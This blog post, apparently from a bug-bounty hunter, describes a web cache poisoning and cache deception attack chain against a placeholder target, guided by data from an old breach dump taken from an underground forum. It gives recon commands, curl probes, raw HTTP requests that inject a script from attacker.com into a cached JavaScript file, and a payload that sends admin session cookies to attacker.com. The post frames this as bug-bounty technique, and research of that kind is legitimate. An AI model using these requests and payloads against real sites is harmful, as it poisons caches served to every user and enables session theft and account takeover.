Hey there!😁
I once reused an old password from years ago… and somehow my Netflix started recommending Turkish dramas at 2 AM. That's when it hit me — the internet doesn't forget anything. It just quietly waits for the right moment. Old data breaches? Same story. They don't expire… they just sit there, aging like fine wine for attackers. And if you're into bug bounty, those "expired" leaks are often where the real money starts.
🧠 How This All Started
This wasn't some planned deep-dive. It was one of those late-night recon sessions where you're just clicking around, half-focused, hoping something interesting pops up.
Started with the usual:
subfinder -d target.com -all -recursive -o subs.txt
httpx -l subs.txt -mc 200,302 -o live.txtThen pulled endpoints:
cat live.txt | gau | grep -E "\.json|\.js|api|v1|internal" | tee endpoints.txtNothing unusual at first glance. But one thing stood out — a pattern in asset domains that didn't quite match the current infrastructure.
That's when I decided to check something most people ignore…
Old breach data.
📜 Digging Into Old Leaks (The Overlooked Goldmine)
I found an old dump floating around in a well-known underground forum. Nothing fancy — just a typical breach:
- Employee emails
- Internal subdomains
- Old API paths
- CDN endpoints
Most hunters scroll past this stuff.
But I've learned the hard way — companies change their UI faster than they change their backend logic.
And that's where things get interesting.
🔍 Connecting the Dots
From the leak:
cdn-old.targetassets.com
api-internal.target.local
/static/v2/legacy/From current recon:
assets.targetcdn.com
api.target.comThe naming style hadn't changed much. That was enough of a signal.
So I filtered for anything cache-related:
cat endpoints.txt | grep -i "static\|cdn\|cache" > cache_targets.txtOne endpoint caught my eye:
https://assets.targetcdn.com/static/app.jsPerfect candidate for cache testing.
💣 Step 1: Understanding the Cache Behavior
Instead of throwing random params, I tested headers.
curl -I https://assets.targetcdn.com/static/app.js \
-H "X-Forwarded-Host: test.com"Response included:
X-Cache: HITTried again with a different value:
curl -I https://assets.targetcdn.com/static/app.js \
-H "X-Forwarded-Host: attacker.com"Same response.
That's when it clicked — this header wasn't part of the cache key.
Which means…
👉 It could be abused.
🧪 Step 2: Using Legacy Knowledge
From the old leak, I knew the system previously trusted:
cdn-old.targetassets.comSo I crafted a request that mixes old trust assumptions with new infrastructure:
GET /static/app.js HTTP/1.1
Host: assets.targetcdn.com
X-Forwarded-Host: cdn-old.targetassets.com.attacker.comWhy this works sometimes:
- Legacy parsing logic still exists
- Partial hostname validation fails
- Internal trust rules weren't fully updated
💥 Step 3: Cache Poisoning
Now came the real test — injecting something that gets cached.
GET /static/app.js HTTP/1.1
Host: assets.targetcdn.com
X-Forwarded-Host: attacker.com
X-Original-URL: /static/app.js?cb=<script src=//attacker.com/payload.js></script>Waited a bit… then fetched the file again:
curl https://assets.targetcdn.com/static/app.jsAnd there it was.
The payload was included in the response — and more importantly, it was cached.
That meant every user requesting this file would get the poisoned version.
🎯 Step 4: Turning It Into Real Impact
At this point, it's not about proving a bug — it's about showing impact.
From the breach data, I already had:
- Admin panel routes
- Internal JS references
- Employee roles
So I targeted a JS file used inside an admin dashboard.
Injected payload:
fetch("https://attacker.com/log?c=" + document.cookie)Now when an admin loads the panel:
- The poisoned JS executes
- Session cookies get sent out
- Internal access is compromised
No brute force. No guessing. Just chaining old data with a modern flaw.
🧬 Bonus: Cache Deception Using Old Endpoints
The leak also showed:
/user/export?format=jsonThe current app had:
/user/exportSo I tried:
GET /user/export.css HTTP/1.1Response came back as JSON but with cacheable headers.
That's classic cache deception.
Now imagine combining:
- cache poisoning
- cache deception
- authenticated endpoints
That's sensitive data exposure at scale.
🕶️ A Quick Reality Check
A lot of recent breaches still expose:
- Old API keys that were never rotated
- Internal naming patterns
- Hidden endpoints no longer linked but still active
I've personally seen keys from years ago still working in production.
Not because companies don't care — but because cleaning up old infrastructure is always "tomorrow's problem."
🧠 What This Taught Me
This wasn't about finding a fancy zero-day.
It was about understanding one simple thing:
👉 Systems evolve, but mistakes don't disappear.
If you start treating old leaks as part of your recon process, you'll notice patterns others miss.
🧪 Testee
subfinder -d target.com -all -recursive
httpx -mc 200,302
gau | grep -E "\.js|api|internal"
curl -I -H "X-Forwarded-Host: attacker.com"
X-Cache: HIT
Cache-Control
Age header
X-Forwarded-Host
X-Original-URL
X-HostIf you've made it this far, you already know — bug bounty isn't just about testing inputs.
It's about thinking like someone who connects timelines.
Old breach + new bug = unexpected impact.
And honestly… that's where things start getting fun. 😏
Connect with Me!
- Instagram: @rev_shinchan
- Gmail: rev30102001@gmail.com